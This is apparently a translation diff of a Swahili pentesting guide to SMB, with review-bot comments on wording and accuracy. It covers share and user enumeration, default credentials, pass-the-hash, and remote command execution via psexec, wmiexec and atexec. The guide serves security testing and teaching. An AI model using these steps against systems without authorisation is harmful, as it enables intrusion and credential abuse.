Kwa mfano, katika muktadha wa Windows, inabainishwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa uhitaji wa NetBIOS over TCP/IP, kwa kutumia port 445. Kinyume chake, kwenye mifumo mingine, matumizi ya port 139 yanaonekana, kuonyesha kwamba SMB inaendeshwa pamoja na NetBIOS over TCP/IP.
Kwa mfano, katika muktadha wa Windows, inaelezwa kwamba SMB inaweza kufanya kazi moja kwa moja juu ya TCP/IP, ikiondoa hitaji la NetBIOS juu ya TCP/IP, kwa kutumia Port 445. Kinyume chake, kwenye mifumo tofauti, matumizi ya Port 139 yanaonekana, ikionyesha kwamba SMB inatekelezwa kwa kushirikiana na NetBIOS juu ya TCP/IP.
```
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
```
### SMB
Itifaki ya **Server Message Block (SMB)**, inayofanya kazi kwa muundo wa **client-server**, imeundwa kudhibiti **ufikiaji wa faili**, saraka, na rasilimali nyingine za mtandao kama vichapishaji na routers. Inatumiwa hasa ndani ya mfululizo wa mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vilivyo na matoleo mapya ya mfumo wa uendeshaji wa Microsoft kuingiliana bila mshono na vilivyoendesha matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, likiwezesha utekelezaji wa SMB kwenye mifumo ya **Linux** na Unix, na hivyo kurahisisha mawasiliano ya majukwaa mbalimbali kupitia SMB.
The **Server Message Block (SMB)** protocol, operating in a **client-server** model, imeundwa kudhibiti **ufikiaji wa faili**, direktori, na rasilimali nyingine za mtandao kama printers na routers. Imetumika hasa ndani ya mfumo wa uendeshaji wa **Windows**, SMB inahakikisha utangamano wa nyuma, ikiruhusu vifaa vyenye matoleo mapya ya mfumo wa Microsoft kuingiliana bila tatizo na vilivyo kwenye matoleo ya zamani. Zaidi ya hayo, mradi wa **Samba** unatoa suluhisho la programu huru, kuruhusu utekelezaji wa SMB kwenye mifumo ya **Linux** na **Unix**, na hivyo kuwezesha mawasiliano ya cross-platform kupitia SMB.
Shares, zinazo wakilisha **sehemu yoyote ya mfumo wa faili wa ndani**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa mviringo uonyeshewe kwa mteja kwa sehemu **huru** kutoka kwa muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **haki za ufikiaji**, zinaruhusu **udhibiti wa kina** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kupewa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
Shares, zinazoonyesha **arbitrary parts of the local file system**, zinaweza kutolewa na server ya SMB, na kufanya muundo wa hierarchy uonekane kwa mteja kwa namna inayokuwa kwa sehemu **independent** na muundo halisi wa server. The **Access Control Lists (ACLs)**, ambazo zinafafanua **access rights**, zinaruhusu **fine-grained control** juu ya ruhusa za watumiaji, ikijumuisha sifa kama **`execute`**, **`read`**, na **`full access`**. Ruhusa hizi zinaweza kutolewa kwa watumiaji binafsi au vikundi, kulingana na shares, na ni tofauti na ruhusa za ndani zilizowekwa kwenye server.
### IPC$ Share
Ufikiaji wa IPC$ share unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility `enum4linux` ni muhimu kwa madhumuni haya. Ikiwa itatumika vizuri, inaruhusu kupata:
Ufikiaji wa share ya IPC$ unaweza kupatikana kupitia anonymous null session, kuruhusu mwingiliano na huduma zinazofunguliwa kupitia named pipes. Utility ya `enum4linux` ni muhimu kwa madhumuni haya. Ikiotumika ipasavyo, inaruhusu upokezi wa:
- Taarifa kuhusu mfumo wa uendeshaji
- Maelezo kuhusu domain ya mzazi
- Maelezo juu ya parent domain
- Orodha ya watumiaji na vikundi vya ndani
- Taarifa kuhusu SMB shares zilizopo
- Sera ya usalama ya mfumo inayotekelezeka
- Taarifa juu ya SMB shares zinazopatikana
- Sera ya usalama ya mfumo inayotekelezwa
Kazi hii ni muhimu kwa wasimamizi wa mtandao na wataalam wa usalama kutathmini hali ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaowezekana na kuhakikisha kuwa huduma za SMB zimewekwa salama ipasavyo.
Uwezo huu ni muhimu kwa wasimamizi wa mtandao na wataalamu wa usalama kutathmini nafasi ya usalama ya huduma za SMB (Server Message Block) kwenye mtandao. `enum4linux` hutoa mtazamo kamili wa mazingira ya SMB ya mfumo lengwa, jambo muhimu kwa kubaini udhaifu unaoweza kuwepo na kuhakikisha kwamba huduma za SMB zimetunzwa ipasavyo.
```bash
enum4linux -a target_ip
```
Amri iliyotangulia ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya lengo lililobainishwa na `target_ip`.
Amri hapo juu ni mfano wa jinsi `enum4linux` inaweza kutumika kufanya full enumeration dhidi ya target iliyobainishwa kama `target_ip`.
## NTLM ni nini
Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana ambapo umeelezwa **jinsi protocol hii inavyofanya kazi na jinsi unavyoweza kuinufaisha:**
Ikiwa haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kuitumia vibaya, utapata ukurasa huu kuhusu **NTLM** kuwa wa kuvutia sana, ambapo umeelezewa **jinsi protokoli hii inavyofanya kazi na jinsi unavyoweza kuitumia kwa faida:**
{{#ref}}
../../windows-hardening/ntlm/
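Review bot: the new line `Ikiotumika ipasavyo, inaruhusu upokezi wa:` has a typo; it should read `Ikitumika ipasavyo`. The rewrite also regresses in the opposite direction to the rest of the hunk: the old `Shares, zinazo wakilisha **sehemu yoyote ya mfumo wa faili wa ndani**` and `**udhibiti wa kina** juu ya ruhusa` were in Swahili, while the new versions keep `arbitrary parts of the local file system`, `access rights` and `fine-grained control` in English inside Swahili sentences; either translate them or quote them as terms consistently across the page. One factual nit both copies carry: a NetBIOS name is 16 bytes, but the 16th byte is the service suffix, so the human-readable name is at most 15 characters, not 16.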
@ -52,12 +52,12 @@ Kama haujui NTLM ni nini au unataka kujua jinsi inavyofanya kazi na jinsi ya kui
```bash
nbtscan -r 192.168.0.1/24
```
### Toleo la server la SMB
### Toleo la seva la SMB
Ili kutafuta exploits zinazowezekana kwa toleo la SMB, ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haitokei katika zana nyingine ulizotumia, unaweza:
Ili kutafuta exploits zinazowezekana kwa toleo la SMB ni muhimu kujua toleo linayotumika. Ikiwa taarifa hii haionekani katika zana nyingine zinazotumika, unaweza:
- Tumia **MSF** auxiliary module `**auxiliary/scanner/smb/smb_version**`
- Ama script hii:
- Au skripti hii:
```bash
#!/bin/sh
#Author: rewardone
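Review bot: drive-by on the unchanged context line `- Tumia **MSF** auxiliary module \`**auxiliary/scanner/smb/smb_version**\``: the `**` markers sit inside the backticks, so they render literally as part of the module path instead of bolding it; move the emphasis outside the code span or drop it. The `Ama script hii` to `Au skripti hii` wording change is fine.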
@ -74,18 +74,18 @@ tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i
echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null
echo "" && sleep .1
```
### **Tafuta exploit**
### **Utafutaji wa exploit**
```bash
msf> search type:exploit platform:windows target:2008 smb
searchsploit microsoft smb
```
### **Inawezekana** Credentials
### **Vinavyowezekana** Vyeti
| **Username(s)** | **Common passwords** |
| -------------------- | ----------------------------------------- |
| _(blank)_ | _(blank)_ |
| guest | _(blank)_ |
| Administrator, admin | _(blank)_, password, administrator, admin |
| **Jina la Mtumiaji(s)** | **Manenosiri ya kawaida** |
| ----------------------- | --------------------------------------- |
| _(bure)_ | _(bure)_ |
| guest | _(bure)_ |
| Administrator, admin | _(bure)_, password, administrator, admin |
| arcserve | arcserve, backup |
| tivoli, tmersrvd | tivoli, tmersrvd, admin |
| backupexec, backup | backupexec, backup, arcada |
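Review bot: in the credentials table `_(blank)_` is translated as `_(bure)_`, which means "free" rather than "empty"; use `_(tupu)_` so a reader understands that an empty username or password is meant. The header `**Jina la Mtumiaji(s)**` bolts an English plural suffix onto a Swahili noun; `**Majina ya Watumiaji**`, or leaving `Username(s)` untranslated as other column headers on this page are, reads better. Likewise `Vyeti` in `### **Vinavyowezekana** Vyeti` means certificates; `hati za kuingia` (or the untranslated `Credentials`, as used elsewhere on the page) is the intended sense.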
@ -119,9 +119,9 @@ rpcclient -U "username%passwd" <IP> #With creds
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 139 [[domain/]username[:password]@]<targetName or address>
/usr/share/doc/python3-impacket/examples/rpcdump.py -port 445 [[domain/]username[:password]@]<targetName or address>
```
### Orodhesha Watumiaji, Makundi & Watumiaji Walioingia
### Orodhesha Watumiaji, Vikundi & Watumiaji Waliyeingia
Taarifa hizi zinapaswa tayari kuwa zimekusanywa kutoka enum4linux na enum4linux-ng
Taarifa hizi zinapaswa tayari kuwa zimekusanywa na enum4linux na enum4linux-ng
```bash
crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
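Review bot: the new heading `### Orodhesha Watumiaji, Vikundi & Watumiaji Waliyeingia` introduces a grammatical error; the old `Walioingia` is the correct plural relative form for "logged-in users", so that part of the change should be reverted while keeping `Vikundi`. The `kutoka` to `na` change in the enum4linux sentence is fine.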
@ -139,11 +139,11 @@ enumdomgroups
```bash
lookupsid.py -no-pass hostname.local
```
Mstari mmoja
Oneliner
```bash
for i in $(seq 500 1100);do rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done
```
### Metasploit - Enumerate watumiaji wa ndani
### Metasploit - Orodhesha watumiaji wa ndani
```bash
use auxiliary/scanner/smb/smb_lookupsid
set rhosts hostname.local
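Review bot: `Mstari mmoja` is changed to `Oneliner`, reverting a translated heading to English, while the next heading in the same hunk goes the other way (`Metasploit - Enumerate watumiaji wa ndani` becomes `Metasploit - Orodhesha watumiaji wa ndani`); pick one convention for headings and apply it to the whole page. A caveat worth a sentence next to the rpcclient loop: `seq 500 1100` only covers the built-in and earliest-created RIDs, so raise the upper bound on a domain that has existed for a while, and expect it to be slow and noisy because the loop makes one authenticated RPC call per RID.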
@ -156,21 +156,21 @@ run
rpcclient-enumeration.md
{{#endref}}
### Muunganisho wa GUI kutoka linux
### GUI connection from linux
#### Kwenye terminali:
#### Katika terminal:
`xdg-open smb://cascade.htb/`
#### Katika dirisha la kivinjari cha faili (nautilus, thunar, etc)
#### Katika file browser window (nautilus, thunar, etc)
`smb://friendzone.htb/general/`
## Kuorodhesha Folda Zilizoshirikishwa
## Uorodhesha wa Folda Zilizoshirikiwa
### Orodhesha folda ziloshirikishwa
### Orodhesha folda zilizoshirikiwa
Inashauriwa kila wakati kuangalia ikiwa unaweza kupata chochote, ikiwa huna credentials jaribu kutumia **null** **credentials/guest user**.
Inashauriwa kila wakati kuangalia kama unaweza kupata chochote; ikiwa huna credentials, jaribu kutumia **null** **credentials/guest user**.
```bash
smbclient --no-pass -L //<IP> # Null user
smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP> #If you omit the pwd, it will be prompted. With --pw-nt-hash, the pwd provided is the NT hash
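Review bot: this hunk reverts several already-translated headings to English (`Muunganisho wa GUI kutoka linux` becomes `GUI connection from linux`, `Kwenye terminali` becomes `Katika terminal`, `dirisha la kivinjari cha faili` becomes `file browser window`) while translating the `Kuorodhesha Folda` headings just below; decide whether headings stay in English and be consistent. The typo fix `ziloshirikishwa` to `zilizoshirikiwa` is good. For the comment on `smbclient -U 'username[%passwd]' -L [--pw-nt-hash] //<IP>`, it would help readers to state that with `--pw-nt-hash` the value after `%` is the 32-hex-character NT hash alone, not an `LM:NT` pair as impacket tools expect.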
@ -196,13 +196,13 @@ smbmap [-u "username" -p "password"] -R [Folder] -H <IP> [-P <PORT>] # Recursive
smbmap [-u "username" -p "password"] -r [Folder] -H <IP> [-P <PORT>] # Non-Recursive list
smbmap -u "username" -p "<NT>:<LM>" [-r/-R] [Folder] -H <IP> [-P <PORT>] #Pass-the-Hash
```
### **Hesabu kwa mkono windows shares na kujiunga nazo**
### **Orodhesha kwa mikono windows shares na kujiunga nazo**
Inawezekana umezuiliwa kuonyesha shares zozote za mashine ya mwenyeji na unapojaribu kuorodhesha zinaonekana kana kwamba hakuna shares za kuunganishwa. Kwa hivyo inaweza kuwa vyema kujaribu kwa haraka kuunganishwa kwa mkono na share.
Inawezekana kwamba umezuiwa kuonyesha shares zozote za mashine mwenyeji, na unapojaribu kuziorodhesha inaonekana kama hakuna shares za kuunganishwa nazo. Kwa hivyo inaweza kufaa kujaribu kwa muda mfupi kuunganishwa kwa mikono kwenye share.
Ili kuhesabu shares kwa mkono unaweza kutaka kutazama majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, wakati unatumia session halali (mf. null session au valid credentials). Hizi zinaweza kuonyesha kama share ipo na huna ufikiaji kwake au share haipo kabisa.
Ili kuorodhesha shares kwa mikono unaweza kutaka kutafuta majibu kama NT_STATUS_ACCESS_DENIED na NT_STATUS_BAD_NETWORK_NAME, unapotumia valid session (mfano null session or valid credentials). Hii inaweza kuonyesha ikiwa share ipo na wewe huna ufikiaji wake, au share haipo kabisa.
Majina ya shares ya kawaida kwa targets za Windows ni
Common share names for windows targets are
- C$
- D$
@ -213,9 +213,9 @@ Majina ya shares ya kawaida kwa targets za Windows ni
- SYSVOL
- NETLOGON
(Common share names from _**Network Security Assessment 3rd edition**_)
(Majina ya kawaida ya shares kutoka _**Network Security Assessment 3rd edition**_)
Unaweza kujaribu kujiunga nao kwa kutumia amri ifuatayo
Unaweza kujaribu kuunganishwa nazo kwa kutumia amri ifuatayo
```bash
smbclient -U '%' -N \\\\<IP>\\<SHARE> # null session to connect to a windows share
smbclient -U '<USER>' \\\\<IP>\\<SHARE> # authenticated session to connect to a windows share (you will be prompted for a password)
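Review bot: `(mfano null session or valid credentials)` and `Common share names for windows targets are` leave English fragments inside Swahili sentences; the old `(mf. null session au valid credentials)` and `Majina ya shares ya kawaida kwa targets za Windows ni` were already correct, so revert those two lines. The guidance on reading `NT_STATUS_ACCESS_DENIED` (share exists, no access) versus `NT_STATUS_BAD_NETWORK_NAME` (no such share) is accurate and is the key point of the section; it deserves to stay as the first sentence rather than the second.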
@ -242,7 +242,7 @@ mifano
smbclient -U '%' -N \\\\192.168.0.24\\im_clearly_not_here # returns NT_STATUS_BAD_NETWORK_NAME
smbclient -U '%' -N \\\\192.168.0.24\\ADMIN$ # returns NT_STATUS_ACCESS_DENIED or even gives you a session
```
### **Orodhesha shares kutoka Windows / bila zana za pande za tatu**
### **Orodhesha shares kutoka Windows / bila zana za mtu wa tatu**
PowerShell
```bash
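Review bot: the code fence under the unchanged `PowerShell` label opens as `bash`; tag it `powershell` so the highlighter does not treat cmdlet syntax as shell. On the heading change, `zana za mtu wa tatu` is a literal rendering of "third party" that reads as "a third person's tools"; `zana za nje` conveys the intended meaning, and the old `za pande za tatu` had the same problem.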
@ -261,23 +261,23 @@ net share
# List shares on a remote computer (including hidden ones)
net view \\<ip> /all
```
MMC Snap-in (grafiki)
MMC Snap-in (ya grafiki)
```shell
# Shared Folders: Shared Folders > Shares
fsmgmt.msc
# Computer Management: Computer Management > System Tools > Shared Folders > Shares
compmgmt.msc
```
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizo zilizofichwa zinazopatikana.
explorer.exe (graphical), ingiza `\\<ip>\` ili kuona shares zisizofichwa zinazopatikana.
### Unganisha folda iliyoshirikiwa
### Unganisha shared folder
```bash
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share
```
### **Pakua faili**
### **Pakua mafaili**
Soma sehemu zilizopita ili ujifunze jinsi ya kuungana kwa kutumia credentials/Pass-the-Hash.
Soma sehemu zilizopita ili ujifunze jinsi ya kuunganishwa kwa kutumia credentials/Pass-the-Hash.
```bash
#Search a file and download
sudo smbmap -R Folder -H <IP> -A <FileName> -q # Search the file in recursive mode and download it inside /usr/share/smbmap
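Review bot: the wording changes (`ya grafiki`, `shared folder`, `mafaili`) are fine; one caveat belongs beside `mount -t cifs -o "username=user,password=password" //x.x.x.x/share /mnt/share`: a password passed in `-o` is exposed in the shell history and in `ps` output to every local user while the command runs, so prefer `-o credentials=/path/to/file` (a mode 600 file containing `username=` and `password=` lines) or omit `password=` to be prompted. The `/mnt/share` mount point must also exist before mounting.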
@ -292,16 +292,16 @@ smbclient //<IP>/<share>
> mget *
#Download everything to current directory
```
Amri:
Commands:
- mask: inaeleza mask ambayo inatumika kuchuja faili ndani ya saraka (e.g. "" for all files)
- recurse: huweka au huzima recursion (chaguo-msingi: off)
- prompt: huweka au huzima prompt ya majina ya faili (chaguo-msingi: on)
- mget: inakopa faili zote zinazolingana na mask kutoka host kwenda client machine
- mask: inabainisha mask inayotumika kuchuja faili ndani ya saraka (kwa mfano "" kwa faili zote)
- recurse: hubadilisha recursion kuwa imewezeshwa (chaguo-msingi: imezimwa)
- prompt: hugeuza kuulizwa kwa majina ya faili (chaguo-msingi: imewezeshwa)
- mget: kunakili faili zote zinazolingana na mask kutoka kwenye host kwenda kwenye client machine
(_Taarifa kutoka kwenye manpage ya smbclient_)
### Utafutaji wa Folda Zilizoshirikiwa za Domain
### Utafutaji wa Folda Zinazoshirikiwa za Domain
- [**Snaffler**](https://github.com/SnaffCon/Snaffler)
```bash
@ -313,15 +313,15 @@ Snaffler.exe -s -d domain.local -o snaffler.log -v data
```bash
sudo crackmapexec smb 10.10.10.10 -u username -p pass -M spider_plus --share 'Department Shares'
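Review bot: the new descriptions of `recurse` and `prompt` change their meaning. The old lines said `huweka au huzima` (sets or unsets), which matches the manpage wording that both commands toggle; the new `hubadilisha recursion kuwa imewezeshwa` says recursion is switched on, and `hugeuza kuulizwa` is ambiguous. Since `prompt` defaults to on, issuing it once turns prompting off, which is exactly what a bulk `mget *` needs; say so explicitly, for example `recurse: hubadilisha hali ya recursion (chaguo-msingi: imezimwa)` and `prompt: hubadilisha hali ya kuulizwa majina ya faili (chaguo-msingi: imewezeshwa)`. The `mask ""` description is correct.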
```
Specially interesting from shares are the files called **`Registry.xml`** as they **may contain passwords** for users configured with **autologon** via Group Policy. Or **`web.config`** files as they contains credentials.
Chini ya shares, zinazovutia hasa ni mafaili yanayoitwa **`Registry.xml`**, kwa kuwa zinaweza kuwa na **passwords** za watumiaji waliowekwa na **autologon** kupitia **Group Policy**. Pia mafaili ya **`web.config`** yanaweza kuwa na **credentials**.
> [!TIP]
> Sehemu ya **SYSVOL share** inaweza kusomwa na watumiaji wote walioidhinishwa ndani ya domain. Ndani yake unaweza **kupata** aina nyingi za batch, VBScript, na PowerShell **scripts**.\
> Unapaswa **kuangalia** **scripts** zilizomo ndani yake kwani unaweza **kupata** taarifa nyeti kama **passwords**.
> The **SYSVOL share** inasomeka na watumiaji wote waliothibitishwa kwenye domain. Huko unaweza **find** batch tofauti, VBScript, na PowerShell **scripts**.\
> Unapaswa **check** **scripts** zilizomo ndani yake kwani unaweza **find** taarifa nyeti kama **passwords**.
## Soma Registry
Unaweza kuwa na uwezo wa **kusoma registry** ukitumia credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
Unaweza kuwa na uwezo wa **read the registry** kwa kutumia baadhi ya credentials ulizogundua. Impacket **`reg.py`** inakuwezesha kujaribu:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
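Review bot: the rewritten tip keeps `find`, `check` and `scripts` in English inside Swahili sentences (`Huko unaweza **find** batch tofauti`, `Unapaswa **check** **scripts**`), whereas the old `Ndani yake unaweza **kupata**` and `Unapaswa **kuangalia** **scripts**` were already fully translated; revert to the old wording. Translating the previously untranslated `Registry.xml` / `web.config` paragraph is a welcome fix. For the `reg.py` examples it is worth a comment that `-hashes` takes the `LM:NT` format; the LM half is not used for NTLMv2 authentication, which is why the example simply repeats the NT hash in both positions.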
@ -329,35 +329,35 @@ sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a87
```
## Post Exploitation
**Mpangilio chaguo-msingi** cha **Samba** seva kwa kawaida hupatikana katika `/etc/samba/smb.conf` na linaweza kuwa na baadhi ya **mpangilio hatari**:
Usanidi wa **chaguo-msingi** wa seva ya **Samba** kwa kawaida upo katika `/etc/samba/smb.conf` na unaweza kuwa na baadhi ya **usanidi hatari**:
| **Mpangilio** | **Maelezo** |
| **Mipangilio** | **Maelezo** |
| --------------------------- | ------------------------------------------------------------------- |
| `browseable = yes` | Je, inaruhusu kuorodhesha shares zinazopatikana kwenye share ya sasa? |
| `read only = no` | Je, inazuia uundaji na mabadiliko ya faili? |
| `writable = yes` | Je, inaruhusu watumiaji kuunda na kubadilisha faili? |
| `guest ok = yes` | Je, inaruhusu kuunganishwa na huduma bila kutumia nywila? |
| `enable privileges = yes` | Je, inaheshimu privileges zilizotengwa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani zinapaswa kupewa faili zilizoundwa hivi karibuni? |
| `directory mask = 0777` | Ni ruhusa gani zinapaswa kupewa saraka zilizoundwa hivi karibuni? |
| `browseable = yes` | Kuruhusu kuorodhesha shares zinazopatikana? |
| `read only = no` | Kuzuia uundaji na uhariri wa faili? |
| `writable = yes` | Kuruhusu watumiaji kuunda na kuhariri faili? |
| `guest ok = yes` | Kuruhusu kuunganishwa na huduma bila kutumia nenosiri? |
| `enable privileges = yes` | Kuheshimu vibali vilivyotolewa kwa SID maalum? |
| `create mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa faili mpya zinazoundwa? |
| `directory mask = 0777` | Ni ruhusa gani inapaswa kutolewa kwa saraka mpya? |
| `logon script = script.sh` | Ni script gani inapaswa kutekelezwa wakati wa kuingia kwa mtumiaji? |
| `magic script = script.sh` | Ni script gani inapaswa kutekelezwa wakati script inapofungwa? |
| `magic output = script.out` | Wapi pato la magic script linapaswa kuhifadhiwa? |
| `magic script = script.sh` | Script gani inapaswa kutekelezwa script inapofungwa? |
| `magic output = script.out` | Wapi matokeo ya magic script yanapaswa kuhifadhiwa? |
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **ni nani ameunganishwa**.
Amri `smbstatus` inatoa taarifa kuhusu **seva** na kuhusu **nani ameunganishwa**.
## Thibitisha kwa kutumia Kerberos
Unaweza **kuthibitisha** kwa **kerberos** kwa kutumia zana **smbclient** na **rpcclient**:
Unaweza **kuthibitisha** kwa **Kerberos** ukitumia zana **smbclient** na **rpcclient**:
```bash
smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com
```
## **Tekeleza Amri**
## **Endesha Amri**
### **crackmapexec**
crackmapexec inaweza kutekeleza amri **ikitumia** yoyote ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo mbinu ya **default**. Unaweza kuonyesha chaguo unalopendelea kutumia kwa kigezo `--exec-method`:
crackmapexec inaweza kutekeleza amri kwa **kutumia** mojawapo ya **mmcexec, smbexec, atexec, wmiexec**, ambapo **wmiexec** ndiyo njia ya **chaguo-msingi**. Unaweza kubainisha ni chaguo gani unazopendelea kutumia kwa kipengeo `--exec-method`:
```bash
apt-get install crackmapexec
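Review bot: `kwa kipengeo \`--exec-method\`` has a typo; the old line's `kigezo` (parameter) was right. Two points for the Kerberos block `smbclient --kerberos //ws01win10.domain.com/C$` and `rpcclient -k ws01win10.domain.com`: both need a valid TGT in the credential cache first (`kinit user@DOMAIN.COM`) and the target must be addressed by the FQDN so the `cifs/` SPN resolves, and in Samba 4.15 and later `-k`/`--kerberos` is deprecated in favour of `--use-kerberos=required`. In the smb.conf table, the new description for `read only = no`, `Kuzuia uundaji na uhariri wa faili?`, keeps the inverted phrasing of the English source; stating it as `faili zinaweza kuundwa na kuhaririwa?` avoids the double negative.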
@ -381,8 +381,8 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -H <HASH> #Pass-The-Hash
```
### [**psexec**](../../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../../windows-hardening/lateral-movement/smbexec.md)
Chaguzi zote mbili zitatengeneza **huduma mpya** (kutumia _\pipe\svcctl_ via SMB) kwenye mashine ya mwathiriwa na kuitumia **kutekeleza kitu** (**psexec** ita **upload** executable file kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka katika arguments the payload --**file-less technique-**-).\
**Maelezo zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Chaguzi zote mbili zitaunda **service mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB) kwenye mashine ya mwathiri na kuitumia **kutekeleza kitu** (**psexec** itafanya **upload** faili inayotekelezeka kwenye ADMIN$ share na **smbexec** itaelekeza kwa **cmd.exe/powershell.exe** na kuweka kwenye arguments payload --**file-less technique-**-).\
**Taarifa zaidi** kuhusu [**psexec** ](../../windows-hardening/lateral-movement/psexec-and-winexec.md)na [**smbexec**](../../windows-hardening/lateral-movement/smbexec.md).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
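Review bot: the translation is fine; one caveat belongs next to `Chaguzi zote mbili zitaunda **service mpya** (kwa kutumia _\pipe\svcctl_ kupitia SMB)`: creating that service is the loudest part of both techniques, because the service installation is logged on the target (System log, event ID 7045) whether psexec uploads a binary to ADMIN$ or smbexec points the service at cmd.exe, so "file-less" must not be read as "log-less". It would also help to state the prerequisites both share: a reachable ADMIN$ share and local-administrator rights (or an admin NT hash for pass-the-hash).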
@ -391,19 +391,19 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
psexec \\192.168.122.66 -u Administrator -p 123456Ww
psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash
```
Kwa kutumia **parameter**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
Kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
### [wmiexec](../../windows-hardening/lateral-movement/wmiexec.md)/dcomexec
Endesha kwa siri command shell bila kugusa disk au kuendesha service mpya kwa kutumia DCOM kupitia **port 135.**\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
Endesha kwa siri shell ya amri bila kugusa diski au kuendesha huduma mpya ukitumia DCOM kupitia **port 135.**\
Katika **kali** inapatikana kwenye /usr/share/doc/python3-impacket/examples/
```bash
#If no password is provided, it will be prompted
./wmiexec.py [[domain/]username[:password]@]<targetName or address> #Prompt for password
./wmiexec.py -hashes LM:NT administrator@10.10.10.103 #Pass-the-Hash
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala ya **NTLM**
Kwa kutumia **kigezo**`-k` unaweza kuthibitisha kwa **kerberos** badala ya **NTLM**
```bash
#If no password is provided, it will be prompted
./dcomexec.py [[domain/]username[:password]@]<targetName or address>
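Review bot: `Kutumia **parameter**\`-k\` unaweza authenticate dhidi ya **kerberos**` leaves `authenticate` in English and is the weaker of the two versions in this hunk; the later `Kwa kutumia **kigezo**\`-k\` unaweza kuthibitisha kwa **kerberos**` is the form to use for both occurrences. On the unchanged context lines, `psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass the hash` is misleading: that is the Sysinternals-style `-u/-p` syntax, where `-p` is a password, not a hash; pass-the-hash with impacket is `psexec.py -hashes LM:NT administrator@192.168.122.66`. Also, `bila kugusa diski` (without touching disk) overstates wmiexec.py: it executes via WMI, but by default it redirects the command output to a file under the target's ADMIN$ share and reads it back over SMB, so it does write to disk unless run with `-nooutput`.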
@ -412,7 +412,7 @@ Kwa kutumia **parameter**`-k` unaweza authenticate dhidi ya **kerberos** badala
```
### [AtExec](../../windows-hardening/lateral-movement/atexec.md)
Tekeleza amri kupitia Task Scheduler (kutumia _\pipe\atsvc_ kupitia SMB).\
Tekeleza amri kupitia Task Scheduler (ukitumia _\pipe\atsvc_ kupitia SMB).\
Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
```bash
./atexec.py [[domain/]username[:password]@]<targetName or address> "command"
@ -422,36 +422,36 @@ Katika **kali** iko kwenye /usr/share/doc/python3-impacket/examples/
[https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)
### ksmbd attack surface and SMB2/SMB3 protocol fuzzing (syzkaller)
### ksmbd eneo la mashambulizi na SMB2/SMB3 protocol fuzzing (syzkaller)
{{#ref}}
ksmbd-attack-surface-and-fuzzing-syzkaller.md
{{#endref}}
## **Bruteforce taarifa za kuingia za watumiaji**
## **Bruteforce watumiaji credentials**
**Hii haipendekezwi, unaweza kuzuia akaunti ikiwa utavuka idadi ya jaribio zilizoruhusiwa**
